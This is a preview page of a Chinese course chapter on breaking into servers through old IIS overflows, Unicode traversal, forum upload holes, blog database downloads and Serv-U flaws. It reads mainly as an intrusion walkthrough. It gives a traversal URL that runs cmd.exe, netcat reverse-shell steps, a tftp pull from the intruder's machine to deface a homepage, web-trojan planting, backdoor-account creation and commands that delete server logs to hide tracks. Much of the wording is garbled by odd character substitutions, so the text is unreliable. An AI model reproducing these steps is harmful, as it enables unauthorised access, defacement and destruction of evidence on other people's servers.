服務(wù)器入侵免費(fèi)奉送_第1頁(yè)
服務(wù)器入侵免費(fèi)奉送_第2頁(yè)
服務(wù)器入侵免費(fèi)奉送_第3頁(yè)
服務(wù)器入侵免費(fèi)奉送_第4頁(yè)
服務(wù)器入侵免費(fèi)奉送_第5頁(yè)
已閱讀5頁(yè),還剩75頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

本章內(nèi)容IIS漏洞帶來(lái)的入侵論壇系統(tǒng)帶來(lái)的入侵Blog系統(tǒng)帶來(lái)的入侵Serv-U帶來(lái)的入侵IIS漏洞帶來(lái)的入侵IIS為InternetInformationServer的縮寫(xiě),是Windows系統(tǒng)供應(yīng)的Internet服務(wù),作為“windows組建”附加在windows系統(tǒng)中。通過(guò)IIS,windows系統(tǒng)可以便利的供應(yīng)Web服務(wù)、FTP服務(wù)和SMTP服務(wù)等。IIS在便利用戶(hù)運(yùn)用的同時(shí),也帶來(lái)了平安隱患。據(jù)說(shuō)有關(guān)IIS的平安漏洞有上千種,其中能被用來(lái)入侵的漏洞大多數(shù)屬于“溢出”型漏洞。對(duì)于這種漏洞,入侵者能夠通過(guò)發(fā)送特定格式的數(shù)據(jù)是遠(yuǎn)程服務(wù)器溢出,從而突破系統(tǒng)的疼惜。關(guān)于溢出漏洞.ida&.idq漏洞Painter漏洞Unicode漏洞.asp映射分塊編碼漏洞Webdav漏洞關(guān)于擴(kuò)展引發(fā)的漏洞WindowsMedia服務(wù)nsiislog.dll遠(yuǎn)程緩沖區(qū)溢出漏洞MicrosoftFrontpageServerExtensions遠(yuǎn)程緩沖區(qū)溢出漏洞搜集IIS信息1、通過(guò)[telnet目標(biāo)IP80]搜集Web服務(wù)器版本信息2、在telnet連上之后須要連敲兩次回車(chē)才能得到信息3、通過(guò)[telnet目標(biāo)IP21]搜集FTP服務(wù)器版本信息.ida&.idq漏洞漏洞描述IIS的indexserver.ida/.idqISAPI擴(kuò)展存在緩沖區(qū)溢出漏洞影響系統(tǒng)IIS4.0和5.0IndexServer可以加快Web的搜尋實(shí)力,供應(yīng)對(duì)管理員腳本和Internet數(shù)據(jù)的查詢(xún),默認(rèn)支持管理腳本.ida和查詢(xún)腳本.idq,不過(guò)都是運(yùn)用idq.dll來(lái)進(jìn)行解析。但是存在一個(gè)緩沖區(qū)溢出,其中問(wèn)題存在于idq.dll擴(kuò)展程序上,由于沒(méi)有對(duì)用戶(hù)提交的參數(shù)進(jìn)行邊界檢查,可以導(dǎo)致遠(yuǎn)程攻擊者利用理出貨的system全線(xiàn)來(lái)訪(fǎng)問(wèn)遠(yuǎn)程系統(tǒng)。漏洞檢測(cè)手工方式:在IE中輸入://targetIP/*.ida或://targetIP/*.idq回車(chē)確認(rèn)后假如提示“找不到**文件的信息”,就說(shuō)明存在該漏洞工具檢測(cè):X-Scan在“掃描模塊”中選中“IIS漏洞”,假如得到“可能存在‘IISIndexServerISAPI擴(kuò)展遠(yuǎn)程溢出漏洞(/null.ida)或(/null.idq)’”則說(shuō)明存在該漏洞。漏洞利用IDA入侵實(shí)例IDAHack:是基于叮囑行的溢出工具,能夠溢出打了sp1、sp2補(bǔ)丁的Windows200。當(dāng)遠(yuǎn)程服務(wù)器溢出后,便會(huì)在指定的端口得到一個(gè)Telnet權(quán)限Idahack<host><port><type><shellport>類(lèi)型:中文win2001中文win200sp12中文win200sp23入侵思路1、掃描遠(yuǎn)程服務(wù)器,先用X-scan掃描,然后手工炎癥2、運(yùn)用[idahackIP801520]進(jìn)行溢出3、成功后,運(yùn)用[telnetIP520]遠(yuǎn)程登錄服務(wù)器4、運(yùn)用上一章所講方法建立后門(mén)帳號(hào)5、exit退出IDQ入侵實(shí)例IISIDQ是snake編寫(xiě)的IDQ溢出工具,有叮囑行和圖形界面兩種方式,而且溢出成功后可以選擇兩種入侵方式Iisidq<type><ip><port><1><lport>[叮囑1]Iisidq<type><ip><port><2><ip><lport>[叮囑1]類(lèi)型:0iis5中文win20001iis5中文win2000sp12iis5中文win2000sp2溢出后的連接工具-ncNc在網(wǎng)絡(luò)攻擊中素有“瑞士軍刀”的美譽(yù),是入侵者常常運(yùn)用的工具之一。主動(dòng)連接到外部:nc[-option]hostport[ports]監(jiān)聽(tīng)以等待外部連接:nc–l–pport[-option][host][port]具體講解參考幫助入侵思路1、掃描遠(yuǎn)程服務(wù)器,確認(rèn)存在IDQ溢出漏洞2、IDQ溢出[iisidq0IP8015211]表示以iisidq的連接方式一對(duì)ip進(jìn)行IDQ溢出漏洞,端口為80,成功后,遠(yuǎn)程服務(wù)器會(huì)打開(kāi)521號(hào)端口等待外部連接。參數(shù)[輸入叮囑1]設(shè)為1,表示不運(yùn)用默認(rèn)叮囑“cmd.exe/c+dir”,而是要在以后輸入新的叮囑也可以運(yùn)用iisidq的gui工具來(lái)實(shí)現(xiàn)3、nc連接[nc–vIP521],從而獲得具有管理員權(quán)限的shell4、建立后門(mén)賬號(hào)5、exit退出平安解決方案1、下載安裝補(bǔ)丁2、刪除對(duì).ida和.idq的腳本映射.Printer漏洞Windows2000IIS5.0.printISAPI擴(kuò)展存在緩沖區(qū)溢出漏洞影響系統(tǒng)windows20003個(gè)serverWindow2000iis5.0存在打印擴(kuò)展ISAPI使得.printer擴(kuò)展與msw3prt.dll擴(kuò)展名到msw3prt.dll的映射關(guān)系,并會(huì)處理用戶(hù)懇求,但在msw3port.dll文件中存在緩沖區(qū)溢出漏洞?!癏ost:”欄中包含大約420字節(jié)的Http.printer懇求給服務(wù)器,就可以導(dǎo)致緩沖區(qū)溢出并執(zhí)行人以代碼。該攻擊可以使Web服務(wù)器停止響應(yīng)。該漏洞特殊緊急,僅須要代開(kāi)80端口或者443端口。漏洞檢測(cè)運(yùn)用X-Scan掃描IIS漏洞,假如得到“可能存在IIS5.0.printer遠(yuǎn)程緩沖區(qū)溢出漏洞”則說(shuō)明該服務(wù)器存在.printer漏洞。漏洞利用運(yùn)用工具IIS5.printerExploit進(jìn)行漏洞利用格式:iis5exploit<Tip><Lip><lport>,稍等片刻,假如溢出成功,便會(huì)在本級(jí)nc監(jiān)聽(tīng)的窗口出現(xiàn),此時(shí)入侵者就得到了遠(yuǎn)程服務(wù)器管理員的shell。入侵實(shí)例1、運(yùn)用[nc–l–p250]在本地開(kāi)一個(gè)監(jiān)聽(tīng)端口2、運(yùn)用[iis5exploit<TIP><LIP><LPort>]對(duì)遠(yuǎn)程主機(jī)進(jìn)行漏洞溢出。建立后門(mén)賬號(hào)退出也可以運(yùn)用iisx進(jìn)行漏洞溢出格式:iisx<thost><sp><-p|-a|-rtiptport>Sp:0沒(méi)有補(bǔ)丁,1有補(bǔ)丁-p:假如溢出成功,就會(huì)在遠(yuǎn)端打開(kāi)7788端口等待連接-a:假如溢出成功,會(huì)在遠(yuǎn)端添加一個(gè)管理員賬號(hào)hax:hax,入侵者可以運(yùn)用netuse連接遠(yuǎn)端服務(wù)器,或者運(yùn)用DameWare實(shí)現(xiàn)遠(yuǎn)程限制。-r:反向連接,能夠穿透部分設(shè)置的防火墻。入侵者首先在本地nc打開(kāi)監(jiān)聽(tīng)端口。平安解決方案打補(bǔ)丁,微軟已經(jīng)發(fā)布了針對(duì)該漏洞的補(bǔ)丁Unicode書(shū)目遍歷漏洞微軟IIS4.0或5.0擴(kuò)展Unicode書(shū)目遍歷漏洞影響系統(tǒng):win2000及NT4.0IIS4.0或5.0都存在利用擴(kuò)展Unicode字符取代“/”和“\”而能利用“../”書(shū)目遍歷的漏洞。未經(jīng)授權(quán)的用戶(hù)可能利用IUSR_machinename帳號(hào)的上下文空間訪(fǎng)問(wèn)任何已知的文件。該帳號(hào)在默認(rèn)狀況下屬于Everyone和Users組的成員,因此任何與Web根書(shū)目在同一邏輯驅(qū)動(dòng)器上的能被這些用戶(hù)組訪(fǎng)問(wèn)的文件都能被刪除修改或執(zhí)行。漏洞利用從漏洞的描述可以看出,Unicode漏洞允許未經(jīng)授權(quán)的用戶(hù)運(yùn)用客戶(hù)端IE來(lái)構(gòu)造非法字符。因此只要入侵者能夠狗仔出適當(dāng)?shù)淖址纭?”“\”,就可以利用“../”來(lái)遍歷與Web根書(shū)目處在一個(gè)邏輯驅(qū)動(dòng)器上的書(shū)目,從而導(dǎo)致“非法遍歷”。這樣一來(lái)入侵者就可以利用該方法操作該服務(wù)器上的磁盤(pán)文件,可以新建、下載、刪除、執(zhí)行磁盤(pán)文件。除此之外,入侵者通過(guò)構(gòu)造Unicode編碼利用來(lái)找到并打開(kāi)該服務(wù)器上的cmd來(lái)執(zhí)行叮囑可以利用%c1%1c=‘/’和%c0%2f=‘\’來(lái)構(gòu)造漏洞檢測(cè)手工:假設(shè)遠(yuǎn)程服務(wù)器為win200pro,在IE地址欄中輸入[://IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\],與遠(yuǎn)程服務(wù)器連接之后,假如把C盤(pán)的內(nèi)容列出來(lái)了則證明存在該漏洞。工具檢測(cè):運(yùn)用X-scan選中“IIS漏洞”,假如得到類(lèi)似的“/scripts/..%252f…/cmd.exe?/c+dir”就說(shuō)明存在漏洞漏洞利用利用Unicode漏洞,入侵者能夠把IE編程遠(yuǎn)程執(zhí)行叮囑的限制臺(tái)。不過(guò)Unicode漏洞并不是遠(yuǎn)程溢出漏洞,不能拿到管理員權(quán)限的shell,只能進(jìn)行簡(jiǎn)潔的文件類(lèi)操作。實(shí)例1:涂鴉主頁(yè)1、準(zhǔn)備一個(gè)自己涂鴉的主頁(yè)2、探知遠(yuǎn)程服務(wù)器的Web根書(shū)目假如存在.ida&.idq可以在地址欄中輸入[://ip/1.ida]從而獲得web根書(shū)目通過(guò)查找文件的方法找到遠(yuǎn)程服務(wù)器的Web根書(shū)目。在地址欄中輸入[://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\mmc.gif/s]3、涂鴉主頁(yè):可以利用[dir+web根書(shū)目]來(lái)查找主頁(yè)4、上傳主頁(yè)覆蓋:在本地打開(kāi)TFTP服務(wù)器,不進(jìn)行任何設(shè)置,只要把準(zhǔn)備好的web文件拷貝到tftf服務(wù)器路徑下即可。TFTP的叮囑:[tftp–Ihost[GET|PUT]source[dest]][tftp+IP+get+1.htm+web根書(shū)目\index.htm]來(lái)覆蓋該服務(wù)器的主頁(yè)。實(shí)例2:擦腳印在客戶(hù)端IE閱讀器中利用Unicode編碼漏洞,運(yùn)用下列叮囑清除日志文件:Del+c:\winnt\system32\logfiles\*.*Del+c:\winnt\system32\config\*.evtDel+c:\winnt\system32\dtclog\*.*Del+c:\winnt\system32\*.logDel+c:\winnt\system32\*.txtDel+c:\winnt\*.txtDel+c:\winnt\*.log實(shí)例3:Unicode綜合利用ASP工具—海陽(yáng)頂端網(wǎng)木馬,是一套asp在線(xiàn)的網(wǎng)頁(yè)編輯軟件,支持在線(xiàn)更改、編輯、刪除隨意文本文件,是無(wú)組件asp上傳。1、上傳木馬文件,利用tftp2、隱藏木馬文件,利用attrib+h+s3、可以寫(xiě)成一個(gè)bat處理文件入侵步驟1、把load.bat傳到遠(yuǎn)程服務(wù)器的C盤(pán)[tftp]2、通過(guò)bat文件把木馬傳入該服務(wù)的web根書(shū)目下。3、限制服務(wù)器,密碼是[haiyangtop.126]平安解決方案打補(bǔ)丁進(jìn)行修修復(fù).asp映射分塊編碼漏洞Window2000和NT4IIS.asp映射存在遠(yuǎn)程緩沖溢出漏洞影響系統(tǒng)window2000和NTASPISAPI過(guò)濾器默認(rèn)在window2000和NT4種裝在,存在的漏洞可以導(dǎo)致遠(yuǎn)程執(zhí)行隨意叮囑。惡意攻擊者可以運(yùn)用分塊編碼形式數(shù)據(jù)給IIS服務(wù)器,當(dāng)解碼和解析這些數(shù)據(jù)的時(shí)候可以迫使IIS把入侵者供應(yīng)的數(shù)據(jù)寫(xiě)到內(nèi)存隨意位置。該漏洞可以使win200產(chǎn)生緩沖區(qū)溢出并以IWAM_computername用戶(hù)的權(quán)限執(zhí)行隨意代碼。漏洞檢測(cè)運(yùn)用X-scan,假如得到“可能存在IIS.asp映射分塊編碼遠(yuǎn)程緩沖區(qū)溢出漏洞”就說(shuō)明遠(yuǎn)程服務(wù)器存在該漏洞。漏洞利用IISaps.dlloverflowprogram2.0格式:aspcode<server>[aspfile][webport][winxp]假如鍵入aspcodeIP,接著按幾下回車(chē)鍵等待一會(huì)兒,假如得到c:\winnt\system32>的提示符,就意味著溢出成功。可以通過(guò)打補(bǔ)丁的方式來(lái)解決該漏洞WebDAV漏洞Windows2000ntdll.dllwebDAV接口遠(yuǎn)程緩沖區(qū)溢出漏洞影響系統(tǒng)window2000系統(tǒng)IIS5.0帶有WebDAV組件對(duì)用戶(hù)輸入的傳遞給ntdll.dll程序處理的懇求未作充分的邊界檢查,遠(yuǎn)程入侵者可以通過(guò)向WebDAV提交一個(gè)細(xì)心構(gòu)造的超常數(shù)據(jù)懇求而導(dǎo)致發(fā)生緩沖區(qū)溢出,可能使入侵者以L(fǎng)ocalSystem的權(quán)限在主機(jī)上執(zhí)行隨意叮囑。漏洞檢測(cè)WebDAVScan是紅盟編寫(xiě)的特地用于檢測(cè)IIS5.0中WebDAV漏洞的專(zhuān)用掃描器,可以?huà)呙枰粋€(gè)IP段,并可以返回遠(yuǎn)程服務(wù)的Web服務(wù)器版本。漏洞利用Wd0.3-en.exe:英文版IIS溢出工具,須要與nc協(xié)作運(yùn)用,能夠突破確定限制的防火墻。首先運(yùn)用nc在本地打開(kāi)一個(gè)監(jiān)聽(tīng)端口[nc–vv–l–p250]然后打開(kāi)wd0.3-en.exe,在其中輸入遠(yuǎn)程服務(wù)器IP,本機(jī)IP和端口。然后進(jìn)行漏洞溢出,等一段時(shí)間后,假如WebDAV漏洞溢出成功,遠(yuǎn)程服務(wù)器便會(huì)與本地的監(jiān)聽(tīng)端口主動(dòng)連接,建立連接后,就可以執(zhí)行任何叮囑。Webdavx3,中文版的IIS溢出工具,溢出成功后干脆打開(kāi)7788端口等待連接。運(yùn)用方法:webdavx3<tip>WebDAV:突破防火墻的WebDAV溢出運(yùn)用方法:webdav<tip><port><offset>Port:為目標(biāo)web服務(wù)器的端口Offset:一般設(shè)為0,8,9的成功幾率高一旦出現(xiàn)“c:\inetput\wwwroot\nnnnnOK!”表示成功。留意該工具只支持中文版的win2000實(shí)例運(yùn)用Webdavx3對(duì)中文版的IIS5進(jìn)行WebDAV漏洞溢出1、運(yùn)用WebDAVScan掃描WebDAV漏洞2、運(yùn)用Webdavx3對(duì)遠(yuǎn)程IIS5進(jìn)行溢出3、運(yùn)用telnet或者nc遠(yuǎn)程登錄服務(wù)器4、建立后門(mén)賬號(hào)5、退出平安解決方案安裝微軟供應(yīng)的相關(guān)補(bǔ)丁WebDAV超常懇求遠(yuǎn)程拒絕服務(wù)攻擊漏洞MicrosoftIISWebDAV超常懇求遠(yuǎn)程拒絕服務(wù)攻擊漏洞影響系統(tǒng):IIS5.0IIS5.1描述:IIS5.0默認(rèn)供應(yīng)了對(duì)WebDAV的支持,WebDAV可以通過(guò)HTTP向用戶(hù)供應(yīng)遠(yuǎn)程文件存儲(chǔ)的服務(wù)。WebDAV實(shí)現(xiàn)對(duì)部分模式的超常懇求處理不正確,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞對(duì)IIS服務(wù)器進(jìn)行拒絕服務(wù)攻擊。攻擊者可以運(yùn)用prfofind或search懇求方法,提交包含49153字節(jié)的WebDAV懇求,IIS會(huì)由于拒絕服務(wù)而重新啟動(dòng)。漏洞利用拒絕服務(wù)攻擊也稱(chēng)DoS,在這種攻擊下,通過(guò)堵塞目標(biāo)網(wǎng)絡(luò)或發(fā)送畸形數(shù)據(jù)使遠(yuǎn)程服務(wù)器過(guò)載而癱瘓,從而不能向任何客戶(hù)供應(yīng)服務(wù)。通常來(lái)說(shuō),dos不須要遠(yuǎn)程服務(wù)器存在任何漏洞,完全是惡意攻擊,入侵者得不到任何權(quán)限。實(shí)例通過(guò)WebDAV拒絕服務(wù)攻擊漏洞使遠(yuǎn)程IIS服務(wù)器拒絕服務(wù)運(yùn)用Webdavdos格式webdavdosip但是該工具的成功幾率比較低,其實(shí)可以利用webdavx3進(jìn)行溢出,成功后會(huì)打開(kāi)7788端口,而80端口就死掉了平安解決方案安裝相應(yīng)補(bǔ)丁程序WebDAVXML消息處理遠(yuǎn)程拒絕服務(wù)漏洞影響系統(tǒng):IIS6.05.15.0描述:IIS包含的WebDAV組件對(duì)特殊構(gòu)造的WebDAV懇求處理不正確,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞利用WebDAV消耗大量?jī)?nèi)存和CPU時(shí)間,導(dǎo)致拒絕服務(wù)攻擊。攻擊者可以構(gòu)建惡意的運(yùn)用XML屬性的WebDAVProffind懇求,可導(dǎo)致XML解析器消耗大量的內(nèi)存和CPU時(shí)間,造成拒絕服務(wù)。漏洞檢測(cè)運(yùn)用X-scan,設(shè)定“攻擊測(cè)試腳本”掃描項(xiàng)目進(jìn)行掃描漏洞利用由于須要運(yùn)用到Perl,所以大家下去后自己找資料進(jìn)行學(xué)習(xí)。WindowsMedia服務(wù)nsiislog.dll遠(yuǎn)程緩沖區(qū)溢出漏洞影響系統(tǒng):windows2003/2000描述:MicrosoftWindows媒體服務(wù),支持通過(guò)多播流從網(wǎng)絡(luò)上傳送媒體內(nèi)容給客戶(hù)端。Windows的媒體服務(wù)的ISAPI擴(kuò)展實(shí)現(xiàn)對(duì)用戶(hù)懇求處理存在緩沖區(qū)溢出漏洞,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞對(duì)服務(wù)進(jìn)行拒絕服務(wù)攻擊或執(zhí)行隨意叮囑。在多播流中,為了能記錄客戶(hù)端信息,Windows2000供應(yīng)了多播和單播傳輸進(jìn)行記錄的功能。此功能以ISAPI擴(kuò)展實(shí)現(xiàn)nsiislog.dll。Windows2000下安裝的nsiislog.dll處理超常POST懇求數(shù)據(jù)時(shí)存在緩沖區(qū)溢出漏洞,這可導(dǎo)致供應(yīng)者發(fā)送畸形懇求給服務(wù)器,使IIS停止對(duì)Internet懇求的相應(yīng)或執(zhí)行隨意叮囑。漏洞檢測(cè)假如遠(yuǎn)程計(jì)算機(jī)打開(kāi)了WindowsMedia服務(wù),其主機(jī)上會(huì)打開(kāi)1755端口,而開(kāi)放Media服務(wù)的遠(yuǎn)程主機(jī)有存在漏洞的可能性。運(yùn)用SuperScan來(lái)檢測(cè)主機(jī)是否開(kāi)放了1755端口。或者運(yùn)用X-scan進(jìn)行掃描漏洞利用Iis.exe運(yùn)用格式:iisIPport這個(gè)工具是nsiislog.dll遠(yuǎn)程緩沖區(qū)溢出漏洞的專(zhuān)用溢出工具,溢出成功后,遠(yuǎn)程主機(jī)會(huì)打開(kāi)59端口等待入侵者連接。MicrosoftFrontPageServerExtensions遠(yuǎn)程緩沖區(qū)溢出漏洞影響系統(tǒng):windowsxp,2000描述:MicrosoftFrontpage服務(wù)器擴(kuò)展是Microsoft公司開(kāi)發(fā)的用于加強(qiáng)IISweb服務(wù)器的功能的軟件包FrontpageServerExtensions存在兩個(gè)新的平安漏洞,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞進(jìn)行緩沖區(qū)攻擊,可能以Frontpage進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行隨意指令。運(yùn)用X-scan進(jìn)行掃描運(yùn)用fp30reg<tip><port>進(jìn)行溢出攻擊,溢出成功后綁定9999端口,同時(shí)會(huì)獲得shell權(quán)限。該方法成功的幾率比較高論壇系統(tǒng)帶來(lái)的入侵論壇是Internet上的一種電子信息服務(wù)系統(tǒng),它供應(yīng)一塊公共電子白板,每個(gè)注冊(cè)用戶(hù)都可以在上面發(fā)布信息或者提出看法。常見(jiàn)的論壇程序有動(dòng)網(wǎng)論壇、雷遨論壇和比較流行的BBSXP論壇主要講解一下上傳漏洞和暴庫(kù)漏洞上傳漏洞動(dòng)網(wǎng)論壇上傳漏洞的存在于DVBBS7.0sp2及其更低的全部版本中,其中DVBBSsp2以前的版本可以利用工具干脆上傳asp文件漏洞存在于基本資料修改中頭像上傳位置,單擊上傳按鈕將調(diào)用upfile.asp文件,而該文件存在文件類(lèi)型過(guò)濾不嚴(yán)的問(wèn)題。漏洞利用思路檢測(cè)到漏洞后,在存在漏洞論壇中注冊(cè)一個(gè)用戶(hù)帳號(hào),利用這個(gè)賬號(hào)獲得Cookie,在本地制作網(wǎng)頁(yè)木馬文件,運(yùn)用專(zhuān)用工具結(jié)合已獲得的Cookie值將網(wǎng)頁(yè)木馬上傳到遠(yuǎn)程主機(jī)中。搜尋漏洞在搜尋引擎當(dāng)中搜尋[PoweredBy:DVbbsVersion7.0.0SP1]注冊(cè)用戶(hù)因?yàn)橄胍\(yùn)用上傳漏洞須要進(jìn)入用戶(hù)基本資料設(shè)置頁(yè)面,因此須要先注冊(cè)一個(gè)頁(yè)面,假設(shè)用戶(hù)名為ccniit,密碼為123456獲得COOKIECookie是由Internet站點(diǎn)創(chuàng)建的、將信息存儲(chǔ)在計(jì)算機(jī)上的文件,可以保存用戶(hù)個(gè)人的存儲(chǔ)信息,一旦將cookie保存在計(jì)算機(jī)上,只有創(chuàng)建Cookie的網(wǎng)站才能讀取。COOKIE分為永久cookie和臨時(shí)cookie,臨時(shí)的閱讀器一關(guān)閉就消逝,永久的保存在硬盤(pán)中,下次可以訪(fǎng)問(wèn)。運(yùn)用WinsockExpert獲得cookie運(yùn)用海陽(yáng)頂端網(wǎng)生成木馬程序利用DVBBS上傳利用程序上傳網(wǎng)頁(yè)木馬連接檢測(cè)成功后就可以做進(jìn)一步的入侵了觀(guān)看視頻上傳漏洞的利用平安解決方案論壇系統(tǒng)的上傳漏洞是一個(gè)普遍存在的漏洞,由于不同論壇系統(tǒng)在實(shí)現(xiàn)方式上存在差異,因此對(duì)于上傳漏洞的修補(bǔ),須要到具體的論壇系統(tǒng)的官方網(wǎng)站下載相應(yīng)的補(bǔ)丁包或升級(jí)程序。暴庫(kù)漏洞暴庫(kù)是指通過(guò)顯示錯(cuò)誤信息的方式把數(shù)據(jù)庫(kù)的物理路徑給暴露出來(lái)。觀(guān)看視頻教程暴庫(kù)漏洞利用思路首先檢測(cè)遠(yuǎn)程主機(jī)是否存在漏洞。檢測(cè)到漏洞后注冊(cè)一個(gè)賬號(hào),獲得Cookie信息。暴庫(kù)拿到管理員賬號(hào)、前臺(tái)密碼和后臺(tái)密碼后結(jié)合已經(jīng)獲得的Cookie進(jìn)行Cookie欺瞞,從而獲得管理員權(quán)限。具體的操作看視頻教程Blog系統(tǒng)帶來(lái)的入侵Blog是繼Email,BBS后出現(xiàn)的又一種網(wǎng)絡(luò)溝通方式。Blog大致可以分成兩種形態(tài),一種是個(gè)人創(chuàng)作,另一種是將個(gè)人認(rèn)為好玩的有價(jià)值的內(nèi)容舉薦給讀者。常用的Blog系統(tǒng)有L-Blog,Dlog,MissLog,oBlog等。Blog在給人們帶來(lái)便利的同時(shí),自身也存在須要完善的地方。關(guān)于blog的入侵,介紹下在數(shù)據(jù)庫(kù)漏洞和Cookie欺瞞漏洞干脆下載數(shù)據(jù)庫(kù)漏洞干脆下載數(shù)據(jù)庫(kù)漏洞屬于設(shè)計(jì)漏洞,允許未經(jīng)授權(quán)的用戶(hù)通過(guò)干脆輸入地址下載Blog系統(tǒng)的數(shù)據(jù)庫(kù)。下面以豬飛飛的Dlog系統(tǒng)為例講解如何入侵的入侵思路下載一個(gè)Dlog系統(tǒng),查看其結(jié)構(gòu)得到數(shù)據(jù)庫(kù)所在的默認(rèn)位置。通過(guò)搜尋引擎找尋存在漏洞的Blog主機(jī),運(yùn)用干脆輸入默認(rèn)數(shù)據(jù)庫(kù)路徑的方式下載其數(shù)據(jù)庫(kù)。查看已下載的數(shù)據(jù)庫(kù)中的信息,獲得管理員的相關(guān)信息。運(yùn)用已經(jīng)得到的管理員前后臺(tái)賬號(hào)登錄到遠(yuǎn)程Dlog系統(tǒng)中,變更文件上傳格式限制,上傳網(wǎng)頁(yè)木馬進(jìn)而限制遠(yuǎn)程主機(jī)。具體步驟通過(guò)分析發(fā)覺(jué)dlog的數(shù)據(jù)庫(kù)保存在%WebRoot%\log_mdb\dlog_mdb.mdb在IE地址欄中構(gòu)造出路徑,下載該數(shù)據(jù)庫(kù)打開(kāi)數(shù)據(jù)庫(kù),查找管理員賬號(hào)和密碼破解經(jīng)過(guò)MD5加密的密碼獲得用戶(hù)名和密碼運(yùn)用管理員的帳號(hào)和密碼登錄系統(tǒng)修改上傳文件的類(lèi)型限制,運(yùn)用asa進(jìn)行替換其他類(lèi)型上傳網(wǎng)頁(yè)木馬獲得網(wǎng)馬的路徑,從而獲得WebShell的權(quán)限平安解決方案修改數(shù)據(jù)庫(kù)的存放位置,對(duì)數(shù)據(jù)庫(kù)名稱(chēng)進(jìn)行修改,同時(shí)更新數(shù)據(jù)庫(kù)連接文件的內(nèi)容。Cookie欺瞞漏洞Cookie欺瞞漏洞是由于系統(tǒng)對(duì)Cookie信息驗(yàn)證不嚴(yán)造成的。Cookie欺瞞漏洞很簡(jiǎn)潔被設(shè)計(jì)者忽視,因此網(wǎng)上有很多的信息發(fā)布系統(tǒng)都存在這個(gè)漏洞。Serv-U帶來(lái)的入侵Serv-U由兩部分組成,引擎和用戶(hù)界面,Serv-U引擎(ServUDaemon)是一個(gè)常駐后臺(tái)的程序,負(fù)責(zé)處理各種Ftp客戶(hù)端軟件的ftp叮囑,同時(shí)負(fù)責(zé)執(zhí)行各種文件傳送的軟件。Serv-U用戶(hù)界面負(fù)責(zé)與Serv-U引擎之間的交互Serv-UFtp服務(wù)器MDTM叮囑遠(yuǎn)程緩沖區(qū)溢出漏洞影響系統(tǒng):Serv-U5.04.x3.x2.x具體描述Serv-U在處理MDTM叮囑的參數(shù)時(shí)缺少正確的緩沖區(qū)邊界檢查,遠(yuǎn)程攻擊者可以利用這個(gè)漏洞對(duì)Ftp服務(wù)器程序進(jìn)行緩沖區(qū)溢出攻擊,可能以Ftp進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行隨意叮囑Serv-U供應(yīng)ftp叮囑MDTM用于用戶(hù)更改文件時(shí)間,當(dāng)用戶(hù)成功登陸系統(tǒng),并發(fā)送畸形超長(zhǎng)的時(shí)區(qū)數(shù)據(jù)作為叮囑參數(shù),可觸發(fā)緩沖區(qū)溢出,細(xì)心構(gòu)造參數(shù)數(shù)據(jù)可能以Ftp進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行隨意指令。漏洞說(shuō)明 利用Serv—U服務(wù)器MDTM叮囑遠(yuǎn)程緩沖區(qū)溢出漏洞要求Serv-U的版本號(hào)不能高于5.0,同時(shí)利用此漏洞須要入侵者能夠登錄到系統(tǒng),

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論